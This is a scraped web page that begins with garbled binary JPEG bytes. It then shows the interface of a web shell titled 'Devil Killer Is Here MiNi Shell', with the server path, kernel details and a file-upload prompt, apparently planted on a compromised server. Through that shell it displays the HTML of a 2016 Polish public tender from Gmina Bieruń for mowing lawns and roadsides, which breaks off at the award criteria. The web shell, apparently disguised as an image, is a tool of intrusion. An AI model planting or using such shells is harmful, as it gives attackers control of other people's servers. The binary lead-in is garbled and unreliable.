JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160322/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160322/29369-N-2016.html

<p class="kh_header"><b>Bieruń: UTRZYMANIE ZIELENI  W GMINIE BIERUŃ W ROKU 2016:
Zadanie 1 - Trawniki, pobocza w rejonie Bierunia Nowego;
Zadanie 2 - Trawniki, pobocza w rejonie Bierunia Starego</b><br>
<b>Numer ogłoszenia: 29369 - 2016; data zamieszczenia: 22.03.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bieruń reprezentowana przez Burmistrza Miasta Bieruń , Rynek 14, 43-150 Bieruń, woj. śląskie, tel. 32 3242400, faks 32 2164777.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bierun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> UTRZYMANIE ZIELENI  W GMINIE BIERUŃ W ROKU 2016:
Zadanie 1 - Trawniki, pobocza w rejonie Bierunia Nowego;
Zadanie 2 - Trawniki, pobocza w rejonie Bierunia Starego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest koszenie miejskich trawników i poboczy oraz zagospodarowanie skoszonej trawy i liści, obejmujące swoim zakresem w szczególności:
a)	Skoszenie trawy z trawników i poboczy do uzyskania równej powierzchni cięcia.
b)	Wycięcie samosiewów drzew, których obwód pnia na wysokości 5 cm nie przekracza:
                 35 cm - w przypadku topoli, wierzb, kasztanowca zwyczajnego, klonu jesionolistnego, klonu srebrzystego,  
                  robinii akacjowej oraz platanu klonolistnego,
                 25 cm - w przypadku pozostałych gatunków drzew.
c)	Wycięcie wszystkich odrostów z pni.
d)	Zebranie i usunięcie odpadów nie ulegających biodegradacji.
e)	Zebranie skoszonej trawy z miejsc przyległych do trawników i poboczy np. chodników, ulic.
f)	Zebranie trawy i gałęzi w stosy - nie dotyczy trawników o koszeniu jednokrotnym (poza terenami innymi).
g)	Zebranie z trawników, poboczy i rowów skoszonej trawy, śmieci, liści, gałęzi.
h)	Przekazanie zebranej trawy, liści i gałęzi do kompostowni a śmieci na składowisko odpadów.
i)	Jesienne sprzątnięcie z trawników liści, gałęzi i śmieci.

2.	W zależności od częstości koszeń trawniki podzielono na klasy. Szczegółowy podział znajduje się w załączniku nr 5, 6 i 7 do SIWZ. 
3.	Ogólny zakres szerokości koszenia poboczy przedstawia poniższa tabela:

CHARAKTER POBOCZA	SZEROKOŚĆ KOSZENIA OD KRAWĘDZI JEZDNI
Pobocze na równym terenie tzn. nachylenie jest mniejsze lub równe 5%	3 m na prostych odcinkach, 4 m w środku łuku zakrętu (lub do linii upraw na terenach rolniczych)
Pobocze ze skarpą tzn. nachylenie jest większe od 5%	Do podnóża skarpy, lecz nie dalej niż 12 m
Pobocze z rowem odwadniającym	Cały rów do wierzchołka skarpy zewnętrznej lecz nie dalej niż14 m


4. Przy realizacji zamówienia Wykonawca zobowiązany jest: 
a)	Poinformować, z co najmniej jednodniowym wyprzedzeniem, właścicieli samochodów parkujących przy trawnikach, o terminach koszenia (np. ulotki wywieszane w miejscu koszeń lub w pobliżu).
b)	Zwrócić szczególną uwagę na drzewa rosnące na terenie koszonym, zwłaszcza nowe nasadzenia. Jeżeli nie posiadają one zabezpieczenia przy podstawie pnia to należy zachować wokół niego strefę ochronną nie koszonej trawy o szerokości 5 cm. W przypadku zniszczenia nasadzeń wykonawca dokona nasadzenia tożsamego w zakresie gatunku i wieku, a w przypadku drzew i krzewów w wieku 10 lat i powyżej, zostanie naliczona kara administracyjna zgodnie z przepisami ustawy o ochronie przyrody (tekst jednolity Dz.U. z 2013 r. , poz. 627 z późn. zm.)
c)	Prowadzić szczegółowy obmiar prac oraz terminów ich wykonania w rozbiciu na miesiące, określone w załącznikach 6 i 7 do SIWZ. Zapisy faktycznie wykonanych prac, wraz z określeniem krotności ich wykonania dołączone do faktury będą podstawą finansowego rozliczenia.
5. Powyższe usługi objęte są stawką VAT w wysokości 8%.            
6. Wymagania w zakresie realizacji zamówienia zawiera również wzór umowy, stanowiący załącznik do 
     SIWZ.
7. Prace będą zlecane przez inspektora GK wg potrzeb (w godzinach pracy Urzędu Miejskiego 
     w Bieruniu) w dwóch trybach:
a)	tryb podstawowy - zlecenie przesłane pisemnie, faksem lub pocztą elektroniczną - termin realizacji do 72 godzin od wysłania zlecenia przez Zamawiającego;
b)	tryb priorytetowy - zlecenie przekazane telefonicznie w pilnych przypadkach (w miarę możliwości potwierdzone faksem lub pocztą elektroniczną) - termin realizacji do 24 godzin od wysłania zlecenia przez Zamawiającego.
8. Zamawiający zastrzega sobie:
a)	Możliwość wprowadzenia zmian w ilości zleconych powierzchni do koszenia.
b)	Ustalanie kolejności koszenia poszczególnych trawników.
c)	Możliwość zmian w lokalizacji powierzchni do koszenia - dotyczy pozycji: Tereny inne,
w załącznikach nr 6 do SIWZ. O wszelkich w/w zmianach Wykonawca zostanie niezwłocznie powiadomiony (tj. do 24 godzin przed rozpoczęciem danego koszenia).
9. Zamawiający przewiduje udzielanie zamówień uzupełniających na podstawie ustawy pzp. 
    Zakres zamówienia zawiera załącznik nr 8 do SIWZ.
10.Zamawiający nie przewiduje dynamicznego systemu zakupów, aukcji elektronicznej, zawarcia umowy ramowej w rozumieniu ustawy pzp oraz udzielania zaliczek na poczet wykonania umowy, stosowania wymagań, o których mowa w art. 29 ust. 4 ustawy pzp.
11. Zamawiający nie zastrzega obowiązku osobistego wykonania przez Wykonawcę kluczowych części zamówienia.
12. Zamawiający dopuszcza składanie ofert częściowych (zadanie 1 lub zadanie 2).
13. Zamawiający nie dopuszcza składania ofert wariantowych.
14. Kody Wspólnego Słownika Zamówień CPV: 77314100-5 Usługi w zakresie trawników.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielanie zamówień uzupełniających na podstawie ustawy pzp oraz specyfikacji istotnych warunków zamówienia.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.31.41.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium dla zadania nr 1 w wysokości 4 000,00 zł (słownie: cztery tysiące złotych 00/100) musi być wniesione w terminie, który został podany w SIWZ w punkcie Terminy.
Wadium dla zadania nr 2 w wysokości 3 000,00 zł (słownie: trzy tysiące złotych 00/100) musi być wniesione w terminie, który został podany w SIWZ w punkcie Terminy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ubieganiu się o udzielenie zamówienia mogą uczestniczyć Wykonawcy, którzy spełniają warunki dotyczące:
Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli                                                                                   przepisy prawa nakładają obowiązek ich posiadania.
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia / nie spełnia, na podstawie przedłożonego przez Wykonawcę :
- oświadczenia (zgodnie z art. 22 ust.1 pkt. 1 ustawy pzp).
     W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia ocena warunku nastąpi łącznie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ubieganiu się o udzielenie zamówienia mogą uczestniczyć Wykonawcy, którzy spełniają warunki dotyczące:
Posiadania wiedzy i doświadczenia.
Wykonali należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, usługę/usługi dotyczące koszenia trawników/poboczy, o łącznej ilości wykonanego koszenia minimum:
a) 800 000 m2 dla zadania nr 1,
b) 600 000 m2  dla zadania nr 2 .
Ocena spełnienia warunku będzie dokonana wg zasady spełnia / nie spełnia, na podstawie przedłożonego przez Wykonawcę : 
-	oświadczenia (zgodnie z art. 22 ust.1 pkt 2 ustawy pzp ),
  -  dokumentów: wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych  również  wykonywanych głównych usług (usługi dotyczące koszenia trawników/poboczy) wraz z podaniem  przedmiotu, dat wykonania i podmiotów na rzecz których usługi te zostały wykonane oraz z załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie. 

Dowodami są:
a)	poświadczenie, z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert;
b)	oświadczenie Wykonawcy, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze   wykonawca nie jest w stanie uzyskać  poświadczenia, o którym mowa wyżej.

W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie usług zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa wyżej.
Zamawiający uzna również za spełnienie warunku wykonanie jednej usługi dotyczące koszenia trawników/poboczy, o  ilości  wykonanego koszenia minimum 800 000  m2 (dla zadania 1) lub 600 000 m2 (dla zadania 2) lub jednej usługi o  ilości  wykonanego koszenia minimum 1 400 000 m2 (w przypadku składania oferty  na całość zamówienia tj.  zadanie 1 i zadanie 2). 
Jeżeli Wykonawca składa ofertę na dwie części zamówienia,  należy wykazać się realizacją wymaganych usług o łącznej  ilości koszenia min. 1 400 000m2.
W przypadku usług nadal wykonywanych (umów nie zakończonych np. z terminem realizacji                               w latach 2014-2017) dla spełnienia warunków należy wykazać wartości usług  już wykonanych i odebranych  (potwierdzonych dowodami) .
Jeżeli Wykonawca polega na zasobach innych podmiotów przy wykazaniu spełnienia warunku wiedzy i doświadczenia należy wykazać udział tych podmiotów w wykonaniu zamówienia.
    W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia ocena warunku nastąpi łącznie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ubieganiu się o udzielenie zamówienia mogą uczestniczyć Wykonawcy, którzy spełniają warunki dotyczące:
Dysponowania  odpowiednim potencjałem technicznym do wykonania zamówienia. 
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/ nie spełnia, na podstawie przedłożonego przez Wykonawcę:
- oświadczenia (zgodnie z art. 22 ust.1 pkt 3 ustawy pzp ).
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia ocena warunku nastąpi łącznie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ubieganiu się o udzielenie zamówienia mogą uczestniczyć Wykonawcy, którzy spełniają warunki dotyczące:
Dysponowania odpowiednimi osobami zdolnymi do wykonania zamówienia. 
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia / nie spełnia, na podstawie przedłożonego przez Wykonawcę : 
- 	oświadczenia (zgodnie z art. 22 ust.1 pkt 3 ustawy pzp ).
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia ocena warunku nastąpi łącznie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ubieganiu się o udzielenie zamówienia mogą uczestniczyć Wykonawcy, którzy spełniają warunki dotyczące:
Sytuacji ekonomicznej i finansowej. 
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/ nie spełnia, na podstawie          przedłożonego przez Wykonawcę:
- oświadczenia (zgodnie z art.22 ust.1 pkt 4 ustawy pzp).
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia ocena warunku nastąpi łącznie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>A.	Lista wymaganych oświadczeń.
Wykonawca przystępujący do postępowania złoży oświadczenie z art. 22 ust. 1 ustawy pzp, że spełnia warunki dotyczące:
1.	Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania.
2.	Posiadania wiedzy i doświadczenia.
3.	Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia.
4.	Sytuacji ekonomicznej i finansowej.

Wszystkie oświadczenia muszą być złożone w oryginale i podpisane przez osobę (osoby) uprawnione do zaciągania zobowiązań w imieniu Wykonawcy.
Jeżeli Wykonawca reprezentowany jest w postępowaniu przez pełnomocnika do oferty należy załączyć pełnomocnictwo, w formie oryginału lub notarialnie poświadczonej kopii.
B. Inne dokumenty
1.	Wykonawca, który ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej dostarcza oświadczenia i dokumenty wymienione w pkt. A Lista wymaganych oświadczeń oraz  w pkt. B Lista wymaganych dokumentów. Zamiast dokumentu, o których mowa w punkcie 2  Listy wymaganych dokumentów, przedstawia dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości  (dokument powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert).
Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem.
      Termin ważności oświadczeń jest taki sam, jak dotyczący dokumentu, o którym mowa wyżej.
2.	Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.
3.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku innych podmiotów, na zasobach których Wykonawca polega na zasadach określonych w art. 26 ust. 2b ustawy pzp, kopie dokumentów dotyczących odpowiednio Wykonawcy lub podmiotów są poświadczane za zgodność z oryginałem odpowiednio przez Wykonawcę lub te podmioty.
4.	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.
Treść zobowiązania podmiotu trzeciego złożonego w oryginale, powinna określać w szczególności:
- kto jest podmiotem przyjmującym zasoby;
- zakres zobowiązania podmiotu trzeciego (wskazanie konkretnych zasobów podmiotu trzeciego, którymi Wykonawca będzie dysponował przy realizacji zamówienia);
- czego konkretnie dotyczy zobowiązanie oraz w jaki sposób będzie zobowiązanie wykonane przy realizacji zamówienia (w realizacji której części zamówienia będzie brał udział podmiot trzeci
i w jakiej formie np. podwykonawstwo);
- jakiego okresu dotyczy zobowiązanie.
W sytuacji, gdy przedmiotem udzielenia są zasoby nierozerwalnie związane z podmiotem ich udzielającym, niemożliwe do obrotu i dalszego udzielenia ich bez zaangażowania tego podmiotu 
w wykonanie zamówienia, taki dokument powinien zawierać wyraźne nawiązanie do uczestnictwa tego podmiotu w wykonaniu zamówienia.
Podmiot, który zobowiązał się do udostępnienia zasobów, odpowiada solidarnie z Wykonawcą za
szkodę Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy.
5.	Jeżeli z uzasadnionej przyczyny Wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez Zamawiającego, może przedstawić inny dokument, który                      w wystarczający sposób potwierdza spełnienie opisanego przez Zamawiającego warunku.
6.	Podmioty występujące wspólnie
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia 
(np. konsorcjum/spółki cywilnej) do oferty należy dołączyć:
a)	Pełnomocnictwo określające zasady reprezentacji ze wskazaniem pełnomocnika (lidera), jego zakresu działania i uprawnień do reprezentowania Wykonawców w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy.
Pełnomocnictwo winno zawierać, w szczególności:
- nazwy wszystkich Wykonawców wspólnie ubiegający się o realizację zamówienia 
i udzielających pełnomocnictwa,
-      nazwę firmy Pełnomocnika/Lidera,
- zakres działania Pełnomocnika/Lidera, uprawnień do reprezentowania Wykonawców 
w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy,
-   czas trwania (zawiązania umowy Wykonawców wspólnie ubiegających się o udzielenie zamówienia tzn. co najmniej okres obejmujący realizację zamówienia),
-      cel zawarcia (wspólny udział w przetargu i wspólna realizacja zamówienia publicznego),
-       datę udzielenia pełnomocnictwa,
-    podpisy wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia, zgodne z zasadą ich reprezentacji.
Pełnomocnictwo należy załączyć w formie oryginału lub notarialnie poświadczonej kopii.
Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem/Liderem.
b)	Oświadczenia wymienione w SIWZ punkcie V.A SIWZ powinny być złożone w taki sposób, 
aby warunki, o których mowa w punkcie IV SIWZ, Wykonawcy występujący wspólnie spełnili łącznie.
c)	Dokumenty wymienione w SIWZ pkt. V B ppkt. 2,3 i 4 Listy wymaganych dokumentów, składa każdy z Wykonawców wchodzących w skład podmiotu występującego wspólnie.
d)	Dokument wymieniony w pkt. V B ppkt. 1  Listy wymaganych dokumentów, powinien być złożone w taki sposób, aby warunki o których mowa w pkt. IV SIWZ, Wykonawcy występujący wspólnie spełnili łącznie. Spełnienie warunku wskazanego w pkt. IV.1 SIWZ będzie uznane, jeżeli wymagane uprawnienia posiadał będzie co najmniej jeden z konsorcjantów, który w ramach przyjętego wewnętrznie podziału zadań, wyznaczony został do realizowania tej części zamówienia, z którym wiąże się obowiązek posiadania danych uprawnień. 
e)	Zgodnie z art. 141 ustawy pzp, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy.
C. Do oferty należy załączyć informacje w zakresie części zamówienia, które zostaną powierzone Podwykonawcom lub podania przez Wykonawcę nazw (firm) Podwykonawców, na których zasoby Wykonawca powołuje się na zasadach określonych w art. 26 ust. 2b ustawy pzp, w celu wykazania spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy pzp.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
